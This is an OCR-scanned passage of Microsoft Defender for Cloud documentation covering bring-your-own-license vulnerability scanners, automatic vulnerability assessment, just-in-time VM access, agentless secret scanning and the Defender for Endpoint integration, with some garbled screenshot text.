To run the script, you need the relevant information for the following parameters: 


Parameter Required Notes 


Subscriptionld vV The subscriptionID of the Azure Subscription that contains 
the resources you want to analyze. 


ResourceGroupName vV Name of the resource group. Use any existing resource group 
including the default ("DefaultResourceGroup-xxx"). 
Since the solution isn't an Azure resource, it isn't listed under 
the resource group, but it's still attached to it. If you later 
delete the resource group, the BYOL solution is unavailable. 


vaSolutionName vV The name of the new solution. 
vaType vV Qualys or Rapid7. 
licenseCode vV Vendor provided license string. 


publicKey vV Vendor provided public key. 


Parameter Required Notes 


autoUpdate - Enable (true) or disable (false) auto deploy for this VA 
solution. When enabled, every new VM on the subscription 
automatically attempts to link to the solution. 
(Default: False) 


Syntax: 
Azure PowerShell 


.\New-ASCVASolution.ps1 -subscriptionId <Subscription Id> -resourceGroupName 
<RG Name> 

-vaSolutionName <New solution name> -vaType <Qualys / Rapid7> -autoUpdate 
<true/false> 

-licenseCode <License code from vendor> -publicKey <Public Key received from 
vendor> 


Example (this example doesn't include valid license details): 


Azure PowerShell 


. \New-ASCVASolution.ps1 -subscriptionId 'f4cx1b69-dtgb-4ch6-6y6Ff- 
ea2e95373d3b' -resourceGroupName 'DefaultResourceGroup-WEU' -vaSolutionName 
"QualysVa@0@1' -vaType ‘Qualys’ -autoUpdate ‘false’ ` 

-licenseCode 

“eyJ jaWQi0iJkZDg50TYzXe4iMTMZLWM4NTAtCODM5 FD2mZWM1N2Q3ZGU5MjgiLCJgbTYuOilyMmM 
SNDg3MS11NTVKLTQ10GItYjh1MC@30TRhMmM3YWM1ZGQiLCIJwd3NVcmwi0iJodHRwczovL3FhZ3B 
1YmxpYy1wMDEuaW5@LnF1YWx5cy5jb20vQ2xvdSKIY6VudC8iLCIwd3NQb3IEIjoiNDQzIne=" ` 
-publicKey 

"MIGFMA@GCSqGS I b3DQEBAQUAA4GNADCBiQKBgQCOiOLXjOywMFLZIBGPZLwSoc f1Q64GASLK90H 
FEmanBlinkJhZDrZ4YD51M98fThYbAx1Rde2iYV1ze/wD1X4cIvFAyXuN7HbdkeI1B16vWXEBZpU 
U17b0dJOUGoO1ZEZNBhtxi/elEZLghq9Chmah82me/okGMIhJIsCiTtg1VQIDAQAB' 


Next steps 


e Remediate the findings from your vulnerability assessment solution 
e Check out these common questions about vulnerability assessment. 


Defender for Cloud also offers vulnerability analysis for your: 


e SQL databases - Explore vulnerability assessment reports in the vulnerability 
assessment dashboard 
e Azure Container Registry images - Use Microsoft Defender for container registries 


to scan your images for vulnerabilities 


e Amazon AWS Elastic Container Registry images - Use Microsoft Defender for 


container registries to scan your images for vulnerabilities 


Automatically configure vulnerability 
assessment for your machines 


Article e 04/24/2023 


Defender for Cloud collects data from your machines using agents and extensions. To 
save you the process of manually installing the extensions, such as the manual 
installation of the Log Analytics agent, Defender for Cloud reduces management 
overhead by installing all required extensions on existing and new machines. Learn more 
about monitoring components. 


To assess your machines for vulnerabilities, you can use one of the following solutions: 


e Microsoft Defender Vulnerability Management solution (included with Microsoft 
Defender for Servers) 

e Built-in Qualys agent (included with Microsoft Defender for Servers) 

e A Qualys or Rapid7 scanner that you've licensed separately and configured within 
Defender for Cloud (this scenario is called the Bring Your Own License, or BYOL, 
scenario) 


O Note 


To automatically configure a BYOL solution, see Integrate security solutions in 
Microsoft Defender for Cloud. 


Automatically enable a vulnerability 
assessment solution 


1. From Defender for Cloud's menu, open Environment settings. 
2. Select the relevant subscription. 


3. In the Monitoring coverage column of the Defender for Servers plan, select 
Settings. 


e Settings | Defender plans! 


Iziz 
A Cloud Security Posture Management (CSPM) 
bases and storage eso ath 
Monitoring coverage sats 
© reundtont eea On > 
E defender gr e s of) 
A Cloud Workload Protection (CWP) 
Resource quatly Monitoring coverage saws 
ZZ 
O instances © Ful 
© ru 
© Fu 
Se Oru 
Onl 
EO 
@ « key vautts Oru 
b SEA 
E ow: Onn 
When you select Save, Microsoft Defender for Cloud's enhanced security features will be enabled on all the resource types you've selected. The fist 30 days are free, 


For mare information an Defender for Cloud pricing, visi 


4. Turn on the Vulnerability assessment for machines and select the relevant 
solution. 


Settings & monitoring 


Continue 


Defender plans 


Mics workspace tor analysis ZUEI 


Endpoint protection Enables protection powered by Microsoft Defender for endpoint including automatic agent deployment to your servers, and security data a 
integration with Defender for Cloud, Leam more 


Agentiess scanning for machines Seans your machines fr installed eter vulnerabilities without relying en agents or impacting machine performance Lear more eu Eat configuration 


Tip 

If you select the "Microsoft Defender for Cloud built-in Qualys solution" 
solution, Defender for Cloud enables the following policy: Configure 
machines to receive a vulnerability assessment provider Z. 


5. Select Apply and then select Save. 


6. To view the findings for all supported vulnerability assessment solutions, see the 
Machines should have vulnerability findings resolved recommendation. 


Learn more in View and remediate findings from vulnerability assessment solutions 
on your machines. 


Next steps 


Remediate the discovered vulnerabilities 


Defender for Cloud also offers vulnerability assessment for your: 


e SQL databases - Explore vulnerability assessment reports in the vulnerability 
assessment dashboard 

e Azure Container Registry images - Use Microsoft Defender for container registries 
to scan your images for vulnerabilities 

e Amazon AWS Elastic Container Registry images - Use Microsoft Defender for 
container registries to scan your images for vulnerabilities 


Enable just-in-time access on VMs 


Article e 08/27/2023 


You can use Microsoft Defender for Cloud's just-in-time (JIT) access to protect your 
Azure virtual machines (VMs) from unauthorized network access. Many times firewalls 
contain allow rules that leave your VMs vulnerable to attack. JIT lets you allow access to 
your VMs only when the access is needed, on the ports needed, and for the period of 
time needed. 


Learn more about how JIT works and the permissions required to configure and use JIT. 
In this article, you learn how to include JIT in your security program, including how to: 


e Enable JIT on your VMs from the Azure portal or programmatically 

e Request access to a VM that has JIT enabled from the Azure portal or 
programmatically 

e Audit the JIT activity to make sure your VMs are secured appropriately 


Availability 


Aspect Details 
Release state: General availability (GA) 
Supported VMs: © vvs deployed through Azure Resource Manager 


*) VMs deployed with classic deployment models 

OO VMs protected by Azure Firewalls on the same VNET as the VM 
* VMs protected by Azure Firewalls controlled by Azure Firewall 
Manager 

© aws EC2 instances (Preview) 


Required roles and Reader, SecurityReader, or a custom role can view the JIT status and 
permissions: parameters. 
To create a least-privileged role for users that only need to request JIT 
access to a VM, use the Set-JitLeastPrivilegedRole script £ . 


Clouds: © Commercial clouds 
(v) National (Azure Government, Microsoft Azure operated by 21Vianet) 
© Connected AWS accounts (preview) 


Prerequisites 


e JIT requires Microsoft Defender for Servers Plan 2 to be enabled on the 
subscription. 


e Reader and SecurityReader roles can both view the JIT status and parameters. 


e If you want to create custom roles that work with JIT, you need the details from the 
following table: 


To enable Permissions to set 
a user to: 


Configure Assign these actions to the role: 
oreditaJIT © On the scope of a subscription or resource group that is associated with 
policy for a the VM: 
VM Microsoft.Security/locations/jitNetworkAccessPolicies/write 
© On the scope of a subscription or resource group of VM: 


Microsoft.Compute/virtualMachines/write 


Request JIT Assign these actions to the user: 
access toa O Microsoft.Security/locations/jitNetworkAccessPolicies/initiate/action 
VM O Microsoft.Security/locations/jitNetworkAccessPolicies/*/read 

O Microsoft.Compute/virtualMachines/read 

O Microsoft.Network/networkInterfaces/*/read 


O Microsoft.Network/publicIPAddresses/read 


Read JIT Assign these actions to the user: 
policies © Microsoft.Security/locations/jitNetworkAccessPolicies/read 
© Microsoft.Security/locations/jitNetworkAccessPolicies/initiate/action 
O Microsoft.Security/policies/read 
o Microsoft.Security/pricings/read 
O Microsoft. Compute/virtualMachines/read 


© Microsoft.Network/*/read 


O Note 


Only the Microsoft.Security permissions are relevant for AWS. 


e To set up JIT on your Amazon Web Service (AWS) VM, you need to connect your 
AWS account to Microsoft Defender for Cloud. 


Q Tip 


To create a least-privileged role for users that need to request JIT access to a 
VM, and perform no other JIT operations, use the Set-JitLeastPrivilegedRole 
script’ from the Defender for Cloud GitHub community pages. 


O Note 


In order to successfully create a custom JIT policy, the policy name, together with 
the targeted VM name, must not exceed a total of 56 characters. 


Work with JIT VM access using Microsoft 
Defender for Cloud 


You can use Defender for Cloud or you can programmatically enable JIT VM access with 
your own custom options, or you can enable JIT with default, hard-coded parameters 


from Azure virtual machines. 
Just-in-time VM access shows your VMs grouped into: 


e Configured - VMs configured to support just-in-time VM access, and shows: 

o the number of approved JIT requests in the last seven days 

o the last access date and time 

o the connection details configured 

o the last user 

e Not configured - VMs without JIT enabled, but that can support JIT. We 
recommend that you enable JIT for these VMs. 
e Unsupported - VMs that don't support JIT because: 

o Missing network security group (NSG) or Azure Firewall - JIT requires an NSG to 
be configured or a Firewall configuration (or both) 

o Classic VM - JIT supports VMs that are deployed through Azure Resource 
Manager. Learn more about classic vs Azure Resource Manager deployment 
models. 

o Other - The JIT solution is disabled in the security policy of the subscription or 
the resource group. 


Enable JIT on your VMs from Microsoft Defender for 
Cloud 


Home > Microsoft Defender for Cloud | Workload protections 


Just-in-time VM access d x 
©@ Some of your subscriptions don't have Defender for Cloud's full protections enabled. To upgrade those subscriptions, click here. -> 


> What is just-in-time VM access? 


> How does it work? 


Virtual machines 


Configured Not Configured Unsupported 
VMs for which the just-in-time VM access control is already in place. Presented data is for the last week. 
1 vms 
Virtual machine Ty Approved Ty Last access Ty Connection details Last user Ty 
DIR emai 0 Requests N/A 2 
b 


From Defender for Cloud, you can enable and configure the JIT VM access. 


1. Open the Workload protections and, in the advanced protections, select Just-in- 
time VM access. 


2. In the Not configured virtual machines tab, mark the VMs to protect with JIT and 
select Enable JIT on VMs. 


The JIT VM access page opens listing the ports that Defender for Cloud 
recommends protecting: 


22 = SSH 

3389 - RDP 
5985 - WinRM 
5986 - WinRM 


To customize the JIT access: 
a. Select Add. 


b. Select one of the ports in the list to edit it or enter other ports. For each port, 
you can set the: 


e Protocol - The protocol that is allowed on this port when a request is 
approved 

e Allowed source IPs - The IP ranges that are allowed on this port when a 
request is approved 

e Maximum request time - The maximum time window during which a 
specific port can be opened 


c. Select OK. 


3. To save the port configuration, select Save. 


Edit the JIT configuration on a JIT-enabled VM using 
Defender for Cloud 


You can modify a VM's just-in-time configuration by adding and configuring a new port 
to protect for that VM, or by changing any other setting related to an already protected 
port. 


To edit the existing JIT rules for a VM: 


1. Open the Workload protections and, in the advanced protections, select Just-in- 


time VM access. 
2. In the Configured virtual machines tab, right-click on a VM and select Edit. 


3. In the JIT VM access configuration, you can either edit the list of port or select 


Add a new custom port. 


4. When you finish editing the ports, select Save. 


Request access to a JIT-enabled VM from Microsoft 
Defender for Cloud 


When a VM has a JIT enabled, you have to request access to connect to it. You can 
request access in any of the supported ways, regardless of how you enabled JIT. 


1. From the Just-in-time VM access page, select the Configured tab. 
2. Select the VMs you want to access: 


e The icon in the Connection Details column indicates whether JIT is enabled 
on the network security group or firewall. If it's enabled on both, only the 
firewall icon appears. 


e The Connection Details column shows the user and ports that can access the 
VM. 


3. Select Request access. The Request access window opens. 


4. Under Request access, select the ports that you want to open for each VM, the 
source IP addresses that you want the port opened on, and the time window to 


open the ports. 


5. Select Open ports. 


O Note 


If a user who is requesting access is behind a proxy, you can enter the IP 
address range of the proxy. 


Other ways to work with JIT VM access 
Azure virtual machines 


Enable JIT on your VMs from Azure virtual machines 


You can enable JIT on a VM from the Azure virtual machines pages of the Azure portal. 


@ Tip 


If a VM already has JIT enabled, the VM configuration page shows that JIT is 
enabled. You can use the link to open the JIT VM access page in Defender for Cloud 
to view and change the settings. 


1. From the Azure portal“, search for and select Virtual machines. 
2. Select the virtual machine you want to protect with JIT. 
3. In the menu, select Configuration. 
4. Under Just-in-time access, select Enable just-in-time. 
By default, just-in-time access for the VM uses these settings: 


e Windows machines 
o RDP port: 3389 
o Maximum allowed access: Three hours 
o Allowed source IP addresses: Any 
e Linux machines 
o SSH port: 22 
o Maximum allowed access: Three hours 


o Allowed source IP addresses: Any 


5. To edit any of these values or add more ports to your JIT configuration, use 
Microsoft Defender for Cloud's just-in-time page: 


a. From Defender for Cloud's menu, select Just-in-time VM access. 


b. From the Configured tab, right-click on the VM to which you want to add a 
port, and select Edit. 


Virtual machines 
Configured Not Configured Unsupported 


VMs for which the just in time VM access control is already in Į 


21 vms 


E 


Virtual machine Ty Approved 
OA vmes PERRA 
(C) EZ testing321 i Properties 25 
C] E peE-vm 
C] GON 
LJ EZ testing 


c. Under JIT VM access configuration, you can either edit the existing settings of 
an already protected port or add a new custom port. 


d. When you've finished editing the ports, select Save. 


Request access to a JIT-enabled VM from the Azure virtual 
machine's connect page 


When a VM has a JIT enabled, you have to request access to connect to it. You can 
request access in any of the supported ways, regardless of how you enabled JIT. 


Dashboard > Virtual machines 


S VMITEST | Connect 


Virtual machine 


E 


« 


re] 
D 
b 
o 
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Overview 

Activity log 

Access control (IAM) 
Tags 


Diagnose and solve problems 


Settings 


GO 


— 


Networking 
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Disks 

size 

Security 

Advisor recommendations 
Extensions 


Continuous delivery 


i] This VM has a just-in-time access policy. Select "Request access" before connecting. 


RDP | SSH | BASTION 


Connect via SSH with client 
1, Open the client of your choice, e.g. PuTTY or other clients . 


2. Ensure you have read-only access to the private key. 


chmod 400 orenpg.pem D 
3. Provide a path to your SSH private key file. © 
Private key path 
4, Run the example command below to connect to your VM. 
ssh -i <private key path> orenpg@104.43,247.119 D 


Source IP © 


( My IP SARAI, AI configured IPs }} 


Request =h 


To request access from Azure virtual machines: 


1. In the Azure portal, open the virtual machines pages. 


2. Select the VM to which you want to connect, and open the Connect page. 


Azure checks to see if JIT is enabled on that VM. 


e If JIT isn't enabled for the VM, you're prompted to enable it. 


e If JIT is enabled, select Request access to pass an access request with the 


requesting IP, time range, and ports that were configured for that VM. 


O Note 


After a request is approved for a VM protected by Azure Firewall, Defender for 


Cloud provides the user with the proper connection details (the port mapping from 
the DNAT table) to use to connect to the VM. 


PowerShell 


Enable JIT on your VMs using PowerShell 


To enable just-in-time VM access from PowerShell, use the official Microsoft Defender 
for Cloud PowerShell cmdlet Set-AzJitNetworkAccessPolicy. 


Example - Enable just-in-time VM access on a specific VM with the following rules: 


e Close ports 22 and 3389 

e Set a maximum time window of 3 hours for each so they can be opened per 
approved request 

e Allow the user who is requesting access to control the source IP addresses 

e Allow the user who is requesting access to establish a successful session upon an 
approved just-in-time access request 


The following PowerShell commands create this JIT configuration: 
1. Assign a variable that holds the just-in-time VM access rules for a VM: 


Azure PowerShell 
$JitPolicy = (@f{ 


id="/subscriptions/SUBSCRIPTIONID/resourceGroups/RESOURCEGROUP/provider 
s/Microsoft.Compute/virtualMachines/VMNAME" ; 


ports=(@{ 
number=22; 


protocol="*"; 
allowedSourceAddressPrefix=@("*"); 
maxRequestAccessDuration="PT3H"}, 


@{ 
number=3389; 


protocol="*"; 
allowedSourceAddressPrefix=@("*") ; 
maxRequestAccessDuration="PT3H"})}) 


2. Insert the VM just-in-time VM access rules into an array: 


Azure PowerShell 


$JitPolicyArr=@($JitPolicy) 


3. Configure the just-in-time VM access rules on the selected VM: 


Azure PowerShell 


Set-AzJitNetworkAccessPolicy -Kind "Basic" -Location "LOCATION" -Name 
"default" -ResourceGroupName "RESOURCEGROUP" -VirtualMachine 
$JitPolicyArr 


Use the -Name parameter to specify a VM. For example, to establish the JIT 
configuration for two different VMs, VM1 and VM2, use: Set- 


AzJitNetworkAccessPolicy -Name VM1 and Set-AzJitNetworkAccessPolicy -Name VM2. 


Request access to a JIT-enabled VM using PowerShell 


In the following example, you can see a just-in-time VM access request to a specific VM 
for port 22, for a specific IP address, and for a specific amount of time: 


Run the following commands in PowerShell: 
1. Configure the VM request access properties: 
Azure PowerShell 
$JitPolicyVm1 = (@{ 


id="/subscriptions/SUBSCRIPTIONID/resourceGroups/RESOURCEGROUP/provider 
s/Microsoft.Compute/virtualMachines/VMNAME" ; 


ports=(@{ 
number=22; 


endTimeUtc="2020-07-15T17:00:00.3658798Z"; 
allowedSourceAddressPrefix=@("IPV4ADDRESS" ) KK 


2. Insert the VM access request parameters in an array: 
Azure PowerShell 


$JitPolicyArr=@($JitPolicyVm1) 


3. Send the request access (use the resource ID from step 1) 
Azure PowerShell 


Start-AzJitNetworkAccessPolicy -ResourcelId 
"/subscriptions/SUBSCRIPTIONID/resourceGroups/RESOURCEGROUP/providers/M 
icrosoft.Security/locations/LOCATION/jitNetworkAccessPolicies/default" 
-VirtualMachine $JitPolicyArr 


Learn more in the PowerShell cmdlet documentation. 


REST API 


Enable JIT on your VMs using the REST API 


The just-in-time VM access feature can be used via the Microsoft Defender for Cloud 


API. Use this API to get information about configured VMs, add new ones, request 
access to a VM, and more. 


Learn more at JIT network access policies. 


Request access to a JIT-enabled VM using the REST API 


The just-in-time VM access feature can be used via the Microsoft Defender for Cloud 
API. Use this API to get information about configured VMs, add new ones, request 
access to a VM, and more. 


Learn more at JIT network access policies. 


Audit JIT access activity in Defender for Cloud 


You can gain insights into VM activities using log search. To view the logs: 
1. From Just-in-time VM access, select the Configured tab. 
2. For the VM that you want to audit, open the ellipsis menu at the end of the row. 
3. Select Activity Log from the menu. 


(Q Microsoft Defender for Cloud | Justin time VM access d 
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The activity log provides a filtered view of previous operations for that VM along 
with time, date, and subscription. 


4. To download the log information, select Download as CSV. 


Next steps 


In this article, you learned how to configure and use just-in-time VM access. To learn 
why you should use JIT, read the article that explains the threats JIT defends against: 


JIT explained 


Manage secrets with agentless secret 
scanning (preview) 


Article e 08/15/2023 


Attackers can move laterally across networks, find sensitive data, and exploit 
vulnerabilities to damage critical information systems by accessing internet-facing 
workloads and exploiting exposed credentials and secrets. 


Defender for Cloud's agentless secret scanning for Virtual Machines (VM) locates 
plaintext secrets that exist in your environment. If secrets are detected, Defender for 
Cloud can assist your security team to prioritize and take actionable remediation steps 
to minimize the risk of lateral movement, all without affecting your machine's 


performance. 


By using agentless secret scanning, you can proactively discover the following types of 
secrets across your environments: 


e Insecure SSH private keys (Azure, AWS, GCP) - supports RSA algorithm for PuTTy 
files, PKCS#8 and PKCS#1 standards 

e Plaintext Azure SQL connection strings (Azure, AWS) - supports SQL PAAS 

e Plaintext Azure storage account connection strings (Azure, AWS) 

e Plaintext Azure storage account SAS tokens (Azure, AWS) 

e Plaintext AWS access keys (Azure, AWS) 

e Plaintext AWS RDS SQL connection string (Azure, AWS) -supports SQL PAAS 


In addition to detecting SSH private keys, the agentless scanner verifies whether they 
can be used to move laterally in the network. Keys that we didn't successfully verify are 
categorized as unverified in the Recommendation pane. 


Prerequisites 


e An Azure account. If you don't already have an Azure account, you can create your 
Azure free account today”. 


e Access to Defender for Cloud 


e Enable either or both of the following two plans: 
o Defender for Servers Plan 2 
o Defender CSPM 


e Enable agentless scanning for machines. 


For requirements for agentless scanning, see Learn about agentless scanning. 


Remediate secrets with attack path 


Attack path analysis is a graph-based algorithm that scans your cloud security graph. 
These scans expose exploitable paths that attackers may use to breach your 
environment to reach your high-impact assets. Attack path analysis exposes attack paths 
and suggests recommendations as to how best remediate issues that break the attack 
path and prevent successful breach. 


Attack path analysis takes into account the contextual information of your environment 
to identify issues that may compromise it. This analysis helps prioritize the riskiest issues 
for faster remediation. 


The attack path page shows an overview of your attack paths, affected resources and a 
list of active attack paths. 


Azure VM supported attack path scenarios 


Agentless secret scanning for Azure VMs supports the following attack path scenarios: 


e Exposed Vulnerable VM has an insecure SSH private key that is used to 


authenticate to a VM. 


e Exposed Vulnerable VM has insecure secrets that are used to authenticate to a 


storage account. 


e Vulnerable VM has insecure secrets that are used to authenticate to a storage 


account. 


@ Exposed Vulnerable VM has insecure secrets that are used to authenticate to an 


SQL server. 


AWS instances supported attack path scenarios 


Agentless secret scanning for AWS instances supports the following attack path 


scenarios: 


@ Exposed Vulnerable EC2 instance has an insecure SSH private key that is used 


to authenticate to a EC2 instance. 


@ Exposed Vulnerable EC2 instance has an insecure secret that are used to 


authenticate to a storage account. 


@ Exposed Vulnerable EC2 instance has insecure secrets that are used to 


authenticate to an AWS RDS server. 


èe Vulnerable EC2 instance has insecure secrets that are used to authenticate to 


an AWS RDS server. 


GCP instances supported attack path scenarios 


Agentless secret scanning for GCP VM instances supports the following attack path 


scenarios: 


e Exposed Vulnerable GCP VM instance has an insecure SSH private key that is 


used to authenticate to a GCP VM instance. 
To investigate secrets with Attack path: 
1. Sign in to the Azure portal Z. 


2. Navigate to Microsoft Defender for Cloud > Recommendations > Attack path. 
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3. Select the relevant attack path. 
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4. Follow the remediation steps to remediate the attack path. 


? Give us feedback 


Remediate secrets with recommendations 


If a secret is found on your resource, that resource triggers an affiliated 
recommendation that is located under the Remediate vulnerabilities security control on 


the recommendations page. Depending on your resources, either or both of the 
following recommendations appear: 


e Azure resources: Machines should have secrets findings resolved 
e AWS resources: EC2 instances should have secret findings resolved 
e GCP resources: WM instances should have secret findings resolved 
To remediate secrets from the recommendations page: 
1. Sign in to the Azure portal £. 
2. Navigate to Microsoft Defender for Cloud > Recommendations. 
3. Expand the Remediate vulnerabilities security control. 
4. Select either: 
e Azure resources: Machines should have secrets findings resolved 
e AWS resources: EC2 instances should have secret findings resolved 


e GCP resources: VM instances should have secret findings resolved 


5. Expand Affected resources to review the list of all resources that contain secrets. 


6. In the Findings section, select a secret to view detailed information about the 
secret. 


7. Expand Remediation steps and follow the listed steps. 
8. Expand Affected resources to review the resources affected by this secret. 
9. (Optional) You can select an affected resource to see that resources information. 


Secrets that don't have a known attack path, are referred to as secrets without an 


identified target resource. 


Remediate secrets with cloud security explorer 


The cloud security explorer enables you to proactively identify potential security risks 
within your cloud environment. It does so by querying the cloud security graph, which is 
the context engine of Defender for Cloud. The cloud security explorer allows your 
security team to prioritize any concerns, while also considering the specific context and 


conventions of your organization. 

To remediate secrets with cloud security explorer: 
1. Sign in to the Azure portal £. 
2. Navigate to Microsoft Defender for Cloud > Cloud Security Explorer. 
3. Select one of the following templates: 


e VM with plaintext secret that can authenticate to another VM - Returns all 
Azure VMs, AWS EC2 instances, or GCP VM instances with plaintext secret 
that can access other VMs or EC2s. 

e VM with plaintext secret that can authenticate to a storage account - 
Returns all Azure VMs, AWS EC2 instances, or GCP VM instances with 
plaintext secret that can access storage accounts. 

e VM with plaintext secret that can authenticate to a SQL database - Returns 
all Azure VMs, AWS EC2 instances, or GCP VM instances with plaintext secret 
that can access SQL databases. 


If you don't want to use any of the available templates, you can also build your own 


query on the cloud security explorer. 


Remediate secrets from your asset inventory 


Your asset inventory shows the security posture of the resources you've connected to 
Defender for Cloud. Defender for Cloud periodically analyzes the security state of 
resources connected to your subscriptions to identify potential security issues and 
provides you with active recommendations. 


The asset inventory allows you to view the secrets discovered on a specific machine. 
To remediate secrets from your asset inventory: 

1. Sign in to the Azure portal Z. 

2. Navigate to Microsoft Defender for Cloud > Inventory. 

3. Select the relevant VM. 

4. Go to the Secrets tab. 

5. Review each plaintext secret that appears with the relevant metadata. 

6. Select a secret to view extra details of that secret. 


Different types of secrets have different sets of additional information. For example, for 
plaintext SSH private keys, the information includes related public keys (mapping 
between the private key to the authorized keys’ file we discovered or mapping to a 
different virtual machine that contains the same SSH private key identifier). 


Next steps 


e Use asset inventory to manage your resources’ security posture 


Protect your endpoints with Defender 
for Cloud's integrated EDR solution: 
Microsoft Defender for Endpoint 


Article e 07/20/2023 


With Microsoft Defender for Servers, you gain access to and can deploy Microsoft 
Defender for Endpoint to your server resources. Microsoft Defender for Endpoint is a 
holistic, cloud-delivered, endpoint security solution. The main features include: 


e Risk-based vulnerability management and assessment 
e Attack surface reduction 

e Behavioral based and cloud-powered protection 

e Endpoint detection and response (EDR) 

e Automatic investigation and remediation 


e Managed hunting services 


You can learn about Defender for Cloud's integration with Microsoft Defender for 
Endpoint by watching this video from the Defender for Cloud in the Field video series: 
Defender for Servers integration with Microsoft Defender for Endpoint 


For more information about migrating servers from Defender for Endpoint to Defender 
for Cloud, see the Microsoft Defender for Endpoint to Microsoft Defender for Cloud 
Migration Guide. 


Availability 


Aspect Details 

Release state: General availability (GA) 

Pricing: Requires Microsoft Defender for Servers Plan 1 or Plan 2 
Supported © Azure Arc-enabled machines running Windows/Linux 
environments: © azure VMs running Linux (supported versions) 


© azure VMs running Windows Server 2022, 2019, 2016, 2012 R2, 2008 R2 
SP1, Windows 10/11 Enterprise multi-session (formerly Enterprise for Virtual 
Desktops) 

* Azure VMs running Windows 10 or Windows 11 (except if running 
Windows 10/11 Enterprise multi-session) 


Required roles and - To enable/disable the integration: Security admin or Owner 
permissions: - To view Defender for Endpoint alerts in Defender for Cloud: Security 


Aspect Details 


reader, Reader, Resource Group Contributor, Resource Group Owner, 
Security admin, Subscription owner, or Subscription Contributor 


Clouds: © Commercial clouds 
(v) Azure Government 
* Microsoft Azure operated by 21Vianet 
Lv] Connected AWS accounts 
Lv] Connected GCP projects 


Benefits of integrating Microsoft Defender for 
Endpoint with Defender for Cloud 


Microsoft Defender for Endpoint protects your Windows and Linux machines whether 
they're hosted in Azure, hybrid clouds (on-premises), or multicloud environments. 


The protections include: 


e Advanced post-breach detection sensors. Defenders for Endpoint's sensors collect 
a vast array of behavioral signals from your machines. 


e Vulnerability assessment from Microsoft Defender Vulnerability Management. 
With Microsoft Defender for Endpoint installed, Defender for Cloud can show 
vulnerabilities discovered by Defender Vulnerability Management and also offer 
this module as a supported vulnerability assessment solution. Learn more in 
Investigate weaknesses with Microsoft Defender Vulnerability Management. 


This module also brings the software inventory features described in Access a 
software inventory and can be automatically enabled for supported machines with 
the auto deploy settings. 


e Analytics-based, cloud-powered, post-breach detection. Defender for Endpoint 
quickly adapts to changing threats. It uses advanced analytics and big data. It's 
amplified by the power of the Intelligent Security Graph with signals across 
Windows, Azure, and Office to detect unknown threats. It provides actionable 
alerts and enables you to respond quickly. 


e Threat intelligence. Defender for Endpoint generates alerts when it identifies 
attacker tools, techniques, and procedures. It uses data generated by Microsoft 
threat hunters and security teams, augmented by intelligence provided by 
partners. 


When you integrate Defender for Endpoint with Defender for Cloud, you gain access to 
the benefits from the following extra capabilities: 


e Automated onboarding. Defender for Cloud automatically enables the Defender 
for Endpoint sensor on all supported machines connected to Defender for Cloud. 


e Single pane of glass. The Defender for Cloud portal pages displays Defender for 
Endpoint alerts. To investigate further, use Microsoft Defender for Endpoint's own 
portal pages where you'll see additional information such as the alert process tree 
and the incident graph. You can also see a detailed machine timeline that shows 


every behavior for a historical period of up to six months. 
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What are the requirements for the Microsoft 
Defender for Endpoint tenant? 


A Defender for Endpoint tenant is automatically created, when you use Defender for 
Cloud to monitor your machines. 


e Location: Data collected by Defender for Endpoint is stored in the geo-location of 
the tenant as identified during provisioning. Customer data - in pseudonymized 
form - may also be stored in the central storage and processing systems in the 
United States. After you've configured the location, you can't change it. If you have 
your own license for Microsoft Defender for Endpoint and need to move your data 
to another location, contact Microsoft support” to reset the tenant. 


e Moving subscriptions: If you've moved your Azure subscription between Azure 
tenants, some manual preparatory steps are required before Defender for Cloud 
will deploy Defender for Endpoint. For full details, contact Microsoft support Z . 


Enable the Microsoft Defender for Endpoint 
integration 


Prerequisites 


Before you can enable the Microsoft Defender for Endpoint integration with Defender 
for Cloud, you must confirm that your machine meets the necessary requirements for 
Defender for Endpoint: 


e Ensure the machine is connected to Azure and the internet as required: 


o Azure virtual machines (Windows or Linux) - Configure the network settings 
described in configure device proxy and internet connectivity settings: Windows 
or Linux. 


o On-premises machines - Connect your target machines to Azure Arc as 
explained in Connect hybrid machines with Azure Arc-enabled servers. 


e Enable Microsoft Defender for Servers. See Quickstart: Enable Defender for 
Cloud's enhanced security features. 


@ Important 


Defender for Cloud's integration with Microsoft Defender for Endpoint is 
enabled by default. So when you enable enhanced security features, you give 
consent for Microsoft Defender for Servers to access the Microsoft Defender 
for Endpoint data related to vulnerabilities, installed software, and alerts for 
your endpoints. 


e For Windows servers, make sure that your servers meet the requirements for 
onboarding Microsoft Defender for Endpoint. 


e For Linux servers, you must have Python installed. Python 3 is recommended for all 
distros, but is required for RHEL 8.x and Ubuntu 20.04 or higher. If needed, see 
Step-by-step Instructions for Installing Python on Linux. 


e If you've moved your subscription between Azure tenants, some manual 


preparatory steps are also required. For details, contact Microsoft support”. 


Enable the integration 


e On Windows 


e On Linux 


Windows 


The MDE unified solution doesn't use or require installation of the Log Analytics agent. 
The unified solution is automatically deployed for Azure Windows 2012 R2 and 2016 
servers, Windows servers connected through Azure Arc, and Windows multicloud 
servers connected through the multicloud connectors. 


You'll deploy Defender for Endpoint to your Windows machines in one of two ways - 
depending on whether you've already deployed it to your Windows machines: 


e Users with Defender for Servers enabled and Microsoft Defender for Endpoint 
deployed 
e Users who never enabled the integration with Microsoft Defender for Endpoint 


Users with Defender for Servers enabled and Microsoft Defender 
for Endpoint deployed 


If you've already enabled the integration with Defender for Endpoint, you have 
complete control over when and whether to deploy the MDE unified solution to your 
Windows machines. 


To deploy the MDE unified solution, you need to use the REST API call or the Azure 
portal: 


1. From Defender for Cloud's menu, select Environment settings and select the 
subscription with the Windows machines that you want to receive Defender for 
Endpoint. 


2. In the Monitoring coverage column of the Defender for Servers plan, select 
Settings. 


The status of the Endpoint protections component is Partial, meaning that not all 
parts of the component are enabled. 
© Note 


If the status is Off, use the instructions in Users who've never enabled the 
integration with Microsoft Defender for Endpoint for Windows. 


3. Select Fix to see the components that aren't enabled. 


Microsoft Azure 


Home > Microsoft Defender for Cloud | Environment settings > Settings | Defender plans > 


Settings & monitoring x 


Contoso hoi 


E continue 


When you enable an extension, it will be installed on any new or existing resource, by assigning a security policy. 


(Defenders plans : Servers 


Component Description Defender plans Configuration Status 
Log Analytics agent/Azure Monitor agent Collects security-related configurations and event logs from the machine and stores the EO EE Agent Type: Log Analytics 
data in your Log Analytics workspace for analysis. Learn more Selected workspace: default workspace 


Security events: None 
Edit configuration 


Vulnerability assessment for machines Enables vulnerability assessment on your Azure and hybrid machines. Learn more EO - ( 


Endpoint protection Enables protection powered by Microsoft Defender for Endpoint, including automatic EA - CED o ) 
agent deployment to your servers, and security data integration with Defender tor 
1 of 2 components missing. Fix 
Cloud. Learn more 


